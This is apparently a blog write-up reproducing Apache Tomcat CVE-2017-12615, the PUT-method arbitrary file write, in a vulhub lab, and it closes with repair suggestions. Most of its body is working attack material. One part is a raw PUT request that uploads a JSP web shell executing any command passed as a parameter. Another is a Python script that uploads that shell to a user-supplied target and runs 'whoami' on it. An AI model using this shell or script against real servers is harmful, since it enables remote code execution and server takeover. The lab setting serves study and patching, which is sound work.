Sunday, September 8, 2024
HometomcatTomcat PUT method arbitrary file writing vulnerability (CVE-2017-12615)

Tomcat PUT method arbitrary file writing vulnerability (CVE-2017-12615)

1 Principle of vulnerability

  1. In the Apache Tomcat server, the PUT method is usually used to upload files. An attacker can upload malicious files to the server by sending a PUT request.

  2. When the attacker sends a PUT request, the Tomcat server will write the data in the request to the specified file. If an attacker is able to control the file path, they can write a malicious file to any location, enabling arbitrary file writes.

2 Impact of the vulnerability

  1. Arbitrary file writing: An attacker can write malicious files to any location on the server by constructing a malicious PUT request. This could result in the server being taken over by an attacker, or sensitive data being leaked.

  2. Remote code execution: An attacker can upload a malicious script file (such as a JSP file) to the server and then execute malicious code by accessing the file. This may lead to remote code execution vulnerabilities, further threatening the security of the server.

  3. Information leakage: Attackers can access sensitive information on the server, such as configuration files, log files, etc., by writing malicious files.

3 Environment setup

EntervulhubTable of contents
cd vulhub/tomcat/CVE-2017-12615
Deploy vulnerability environment
docker compose build
docker compose up -d
View port
docker compose ps

Visit and you will see a page indicating that the environment is running successfully.

4 Vulnerability Reproduction Steps

1 After capturing the packet, right-click Send to Repeater

2 Modify the request method to PUT, the file name is 1.jsp (any name), and the content is filled with shell script.

PUT /1.jsp/ HTTP/1.1
Host: 192.168.135.132:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=1CCD15499524302645C18183B820C173
Upgrade-Insecure-Requests: 1
Content-Length: 302
​
<%
    java.io.InputStream is = Runtime.getRuntime()
                            .exec(request.getParameter("command"))
                            .getInputStream();
    int a = -1;
    byte\[\] b = new byte\[2048\];
    while ((a = is.read(b)) != -1) {
        out.print(new String(b));
    }
%>

Here you see a 201 return, which means the upload should have been successful.

  1. Use a browser to access exc.jsp and execute any command

5. Write a python script to detect whether the vulnerability exists

#!/usr/bin/env python
​
import requests
import time
​
# hint:This code is for experimental and learning purposes only,Please use with caution。
print(" Notice:This code is for experimental and learning purposes only,Please use with caution")
​
# Define the malicious file name to be uploaded
payload\_file = 'shell1.jsp/'
​
def cve\_2017\_12615():
    # Enter targetIPaddress and port
    url = input("Please enter your goalIPaddress and port(Format:http://172.30.230.107:8080/):")
    # Willpayload\_fileadd to targetURL
    payload\_url = url + payload\_file
    print(payload\_url)
    
    # Define request headers
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0'
    }
​
    # Define malicious script content
    payload\_body = ("<%java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\\"cmd\\")).getInputStream();"
                    "int a = -1;"
                    "byte\[\] b = new byte\[2048\];"
                    "while((a=in.read(b))!=-1){out.println(new String(b));}"
                    "%>")
    # usePUTRequests a malicious script to be written to the server
    response = requests.put(payload\_url, data=payload\_body, headers=headers)
    print(payload\_url\[:-1\])
    print(response.status\_code)
    # wait for a while
    time.sleep(3)
    # Define test load
    test\_payload = {
        "cmd":"whoami"
    }
    # sendGETRequest to test whether the malicious script executes successfully
    response2 = requests.get(payload\_url\[:-1\], headers=headers,params=test\_payload)
    print(response2.status\_code)
    if response2.status\_code == 200:
        print("Vulnerability exists!!")
    else:
        print("The vulnerability does not exist!!")
​
# transfercve\_2017\_12615()function
cve\_2017\_12615()

result

6 Repair suggestions:

  1. Disable the PUT method: In the configuration file of the Apache Tomcat server (such as web.xml), disable the PUT method to prevent attackers from uploading files through PUT requests.

  2. Limit file upload paths: Limit the paths allowed to upload files in the application to prevent attackers from writing malicious files to sensitive locations.

  3. Input verification and filtering: Strictly verify and filter user input to prevent malicious input from causing arbitrary file writing.

  4. Use secure coding practices: Follow the secure coding practices provided by OWASP (Open Web Application Security Project) to ensure the security of your application.

RELATED ARTICLES

Most Popular

Recent Comments